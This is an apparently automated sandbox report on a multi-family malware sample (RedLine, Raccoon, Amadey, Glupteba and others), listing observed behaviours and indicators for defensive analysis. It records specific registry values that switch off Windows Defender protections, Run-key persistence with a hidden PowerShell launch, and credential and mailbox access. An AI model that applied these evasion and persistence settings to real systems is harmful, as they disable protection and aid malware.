Malware Analysis Report

2025-06-16 01:30

Sample ID 231031-k13pmafb4s
Target 3145da3c4eaad8597313817bdf5b98eba6e04257e6dd5a8eb19acc088e309bf4
SHA256 3145da3c4eaad8597313817bdf5b98eba6e04257e6dd5a8eb19acc088e309bf4
Tags
amadey glupteba raccoon redline sectoprat smokeloader zgrat 6a6a005b9aa778f606280c5fa24ae595 @ytlogsbot grome kinza pixelnew up3 backdoor paypal collection discovery dropper evasion infostealer loader persistence phishing rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

3145da3c4eaad8597313817bdf5b98eba6e04257e6dd5a8eb19acc088e309bf4

Threat Level: Known bad

The file 3145da3c4eaad8597313817bdf5b98eba6e04257e6dd5a8eb19acc088e309bf4 was found to be: Known bad.

Malicious Activity Summary

amadey glupteba raccoon redline sectoprat smokeloader zgrat 6a6a005b9aa778f606280c5fa24ae595 @ytlogsbot grome kinza pixelnew up3 backdoor paypal collection discovery dropper evasion infostealer loader persistence phishing rat spyware stealer trojan

Suspicious use of NtCreateUserProcessOtherParentProcess

SectopRAT payload

Amadey

Detect ZGRat V1

Glupteba

Raccoon Stealer payload

Glupteba payload

Raccoon

RedLine payload

ZGRat

Modifies Windows Defender Real-time Protection settings

SectopRAT

RedLine

SmokeLoader

Modifies Windows Firewall

Blocklisted process makes network request

Stops running service(s)

Downloads MZ/PE file

Drops file in Drivers directory

Reads user/profile data of web browsers

Loads dropped DLL

Checks computer location settings

Windows security modification

Executes dropped EXE

Adds Run key to start application

Looks up external IP address via web service

Accesses cryptocurrency files/wallets, possible credential harvesting

Legitimate hosting services abused for malware hosting/C2

Checks installed software on the system

Accesses Microsoft Outlook profiles

Suspicious use of SetThreadContext

Detected potential entity reuse from brand paypal.

Launches sc.exe

Drops file in Program Files directory

Program crash

Unsigned PE

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

outlook_win_path

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Checks SCSI registry key(s)

outlook_office_path

Uses Task Scheduler COM API

Suspicious behavior: GetForegroundWindowSpam

Creates scheduled task(s)

Enumerates system info in registry

Suspicious behavior: MapViewOfSection

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-31 09:04

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-31 09:04

Reported

2023-10-31 09:07

Platform

win10v2004-20231020-en

Max time kernel

76s

Max time network

157s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\36A.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\36A.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\36A.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\36A.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\36A.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\36A.exe N/A

Raccoon

stealer raccoon

Raccoon Stealer payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

ZGRat

rat zgrat

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\kos4.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\58B5.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\6AA9.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\4B3.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\2240.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\FFEB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\98.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\UL1DT8FK.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\RR3qa2yC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28E.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TE7gA6ua.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\36A.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\JG9Vw7bn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4B3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1qc48Ec4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\793.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2RN726JK.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2240.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\255E.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kos4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4385.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-N4IC5.tmp\LzmwAqmV.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\58B5.exe N/A
N/A N/A C:\Windows\System32\Conhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6180.exe N/A
N/A N/A C:\Program Files (x86)\LAudioConverter\LAudioConverter.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6AA9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\36A.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\36A.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\58B5.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Office\12.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\58B5.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\58B5.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\58B5.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\58B5.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\UL1DT8FK.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\RR3qa2yC.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TE7gA6ua.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\JG9Vw7bn.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\255E.exe'\"" C:\Users\Admin\AppData\Local\Temp\255E.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\FFEB.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

Detected potential entity reuse from brand paypal.

phishing paypal

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\LAudioConverter\is-MTBG1.tmp C:\Users\Admin\AppData\Local\Temp\is-N4IC5.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\LAudioConverter\XML\Styles\is-I5DVV.tmp C:\Users\Admin\AppData\Local\Temp\is-N4IC5.tmp\LzmwAqmV.tmp N/A
File opened for modification C:\Program Files (x86)\LAudioConverter\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-N4IC5.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\LAudioConverter\is-P5NQB.tmp C:\Users\Admin\AppData\Local\Temp\is-N4IC5.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\LAudioConverter\is-OKVMN.tmp C:\Users\Admin\AppData\Local\Temp\is-N4IC5.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\LAudioConverter\XML\Styles\is-H7EGQ.tmp C:\Users\Admin\AppData\Local\Temp\is-N4IC5.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\LAudioConverter\is-K5EH6.tmp C:\Users\Admin\AppData\Local\Temp\is-N4IC5.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\LAudioConverter\is-4BLH5.tmp C:\Users\Admin\AppData\Local\Temp\is-N4IC5.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\LAudioConverter\is-GFO65.tmp C:\Users\Admin\AppData\Local\Temp\is-N4IC5.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\LAudioConverter\is-TQBPD.tmp C:\Users\Admin\AppData\Local\Temp\is-N4IC5.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\LAudioConverter\is-8GLCV.tmp C:\Users\Admin\AppData\Local\Temp\is-N4IC5.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\LAudioConverter\XML\Styles\is-P8543.tmp C:\Users\Admin\AppData\Local\Temp\is-N4IC5.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\LAudioConverter\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-N4IC5.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\LAudioConverter\is-L1JEV.tmp C:\Users\Admin\AppData\Local\Temp\is-N4IC5.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\LAudioConverter\is-CGRPF.tmp C:\Users\Admin\AppData\Local\Temp\is-N4IC5.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\LAudioConverter\is-V6UKA.tmp C:\Users\Admin\AppData\Local\Temp\is-N4IC5.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\LAudioConverter\is-UM1HT.tmp C:\Users\Admin\AppData\Local\Temp\is-N4IC5.tmp\LzmwAqmV.tmp N/A
File opened for modification C:\Program Files (x86)\LAudioConverter\LAudioConverter.exe C:\Users\Admin\AppData\Local\Temp\is-N4IC5.tmp\LzmwAqmV.tmp N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\36A.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\kos4.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\6180.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-N4IC5.tmp\LzmwAqmV.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6AA9.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
